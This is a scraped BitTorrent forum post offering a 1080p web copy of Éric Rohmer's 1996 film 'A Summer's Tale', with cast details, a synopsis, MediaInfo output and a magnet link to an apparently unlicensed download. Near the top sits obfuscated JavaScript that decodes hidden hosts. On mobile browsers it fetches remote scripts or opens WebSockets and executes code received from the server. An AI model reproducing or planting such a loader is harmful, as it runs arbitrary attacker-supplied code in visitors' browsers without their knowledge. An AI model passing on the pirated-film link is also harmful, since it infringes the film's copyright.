夏天的故事[简繁字幕].A.Summer's.Tale.1996.1080p.FriDay.WEB-DL.H264.AAC 3.17GB

版主小s 1月前 210

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 夏天的故事 / 夏日的故事 / 人间四季之夏天的故事 / A Summer's Tale
◎片  名 Conte d'été
◎年  代 1996
◎产  地 法国
◎类  别 剧情 / 爱情
◎语  言 法语
◎上映日期 1996-06-05
◎IMDb链接 https://www.imdb.com/title/tt0115940/
◎豆瓣评分 8.3/10 (30551人评价)
◎豆瓣链接 https://movie.douban.com/subject/1302675/
◎片  长 113 分钟
◎导  演 埃里克·侯麦 éric Rohmer (id:1054406)
◎编  剧 埃里克·侯麦 éric Rohmer (id:1054406)
◎演  员 梅尔维尔·珀波 Melvil Poupaud (id:1004891)
       阿曼达·朗格勒 Amanda Langlet (id:1274913)
       格瑙西蒙 Gwena?lle Simon (id:1353696)
       奥蕾莉亚·诺林 Aurelia Nolin (id:1316058)
       雪美莲 Mary Stephen (id:1328982)

◎标  签 法国 / 侯麦 / 爱情 / 法国电影 / 埃里克·侯麦 / 青春 / 文艺 / 新浪潮

◎简  介
  贾斯伯(梅尔维尔·珀波 Melvil Poupaud 饰)来到布列塔尼亚的海边小镇度假,在这里,总是独来独往的他结识了餐馆招待玛戈(阿曼达·朗格勒 Amanda Langlet 饰),两人一见如故相谈甚欢。贾斯伯告诉玛戈,他和一个名叫琳娜(奥蕾莉亚·诺林 Aurelia Nolin 饰)的女孩相约于此,玛戈对此一笑了之不置可否。在一场舞会上,贾斯伯遇见了野性美女苏兰(Gwena?lle Simon 饰),对她一见钟情,苏兰也对这个能歌善舞的小伙子心存好感。虽然玛戈心里不是滋味,但表面上她大度的祝福了这段感情。贾斯伯邀请苏兰共赴他心目中的梦幻之岛,没想到姗姗来迟的琳娜出现在了他的眼前。梦中情人的出现让贾斯伯无比欢欣,很快就忘记了和苏兰的约定,可是琳娜的性格如这个夏天一般多变,此刻还风和日丽,下一刻便已下起瓢泼大雨。苦恼的贾斯伯只得去向玛戈倾诉,但心怀爱...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 57387588271508605870979439053766131908 (0x2B2C728D51276F6E3DB0268960D800C4)

  4. Complete name                            : A.Summer'[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.17 GiB

  8. Duration                                 : 1 h 54 min

  9. Overall bit rate                         : 3 977 kb/s

  10. Encoded date                             : UTC 2021-08-11 05:16:58

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 54 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 4 000 kb/s

  26. Width                                    : 1 920 pixels

  27. Height                                   : 1 080 pixels

  28. Display aspect ratio                     : 16:9

  29. Frame rate mode                          : Constant

  30. Frame rate                               : 29.970 (30000/1001/53354) FPS

  31. Color space                              : YUV

  32. Chroma subsampling                       : 4:2:0

  33. Bit depth                                : 8 bits

  34. Scan type                                : Progressive

  35. Bits/(Pixel*Frame)                       : 0.064

  36. Stream size                              : 3.07 GiB (97%)

  37. Language                                 : English

  38. Default                                  : Yes

  39. Forced                                   : No


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 54 min

  46. Bit rate                                 : 125 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 46.875 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 102 MiB (3%)

  53. Language                                 : French

  54. Default                                  : Yes

  55. Forced                                   : No


  56. Text #1

  57. ID                                       : 3

  58. Format                                   : UTF-8

  59. Codec ID                                 : S_TEXT/UTF8

  60. Codec ID/Info                            : UTF-8 Plain Text

  61. Duration                                 : 1 h 52 min

  62. Bit rate                                 : 44 b/s

  63. Count of elements                        : 1487

  64. Stream size                              : 37.1 KiB (0%)

  65. Title                                    : Chinese Simplified

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : UTF-8

  72. Codec ID                                 : S_TEXT/UTF8

  73. Codec ID/Info                            : UTF-8 Plain Text

  74. Duration                                 : 1 h 52 min

  75. Bit rate                                 : 44 b/s

  76. Count of elements                        : 1487

  77. Stream size                              : 37.1 KiB (0%)

  78. Title                                    : Chinese Traditional

  79. Language                                 : Chinese

  80. Default                                  : No

  81. Forced                                   : No



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:22A9B1CB76FD24A0D18CC1CB0128CDD571C7BC97
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回